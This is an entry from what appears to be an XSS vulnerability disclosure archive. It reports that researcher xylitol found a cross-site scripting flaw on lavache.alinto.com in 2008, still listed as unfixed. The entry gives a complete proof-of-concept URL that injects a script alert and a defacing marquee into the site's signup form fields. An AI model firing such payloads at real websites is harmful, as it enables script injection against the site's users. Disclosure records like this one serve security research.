| 
 
| Security researcher xylitol, has submitted on 23/07/2008 a cross-site-scripting (XSS) vulnerability affecting lavache.alinto.com, which at the time of submission ranked 126643 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 26/07/2008. It is currently unfixed.
 If you believe that this security issue has been corrected, please send us an e-mail.
 |  
              | Date submitted: 23/07/2008 | Date published: 26/07/2008 | Fixed? Mail us! | Status:  UNFIXED |  
| Author: xylitol | Domain: lavache.alinto.com | Category: XSS | Pagerank: 126643 | 
|---|
 
 
| URL: http://lavache.alinto.com/create/create_basic.php?fm1_boite=%27%22%3E%3Cscript%3Ealert(1337)%3C%2Fsc ript%3E%3Cmarquee%3E%3Ch1%3EXSS+BY+XYLITOL%3C%2Fh1%3E%3C%2Fmarquee%3E&fm2_mdp1=%27%22%3E%3Cscript%3E
 alert(1337)%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+BY+XYLITOL%3C%2Fh1%3E%3C%2Fmarquee%3E&fm2_mdp2=&S
 ubmit.x=55&Submit.y=4&etap=1&fm1_nom=Speed&fm1_prenom=Pseudo&fm3_datenais=10%2F04%2F1980&fm1_adresse
 =103+rue+SpeedPseudo&fm1_cp=10000&fm1_ville=SpeedPseudo&fm1_pays=FR&fm1_civ=1&situation=1&fm2_typere
 cup=altern&fm2_altern=carter%40live.fr&lieucnx=1&activite=101§eur=1&EDUCATION=3&tpslibre[0]=0&tp
 slibre[1]=1&proprio=0&enfmoins=0&cnx=6&fm1_jaccepte=oui
 |  
| Click here to view the mirror |  
|  |  |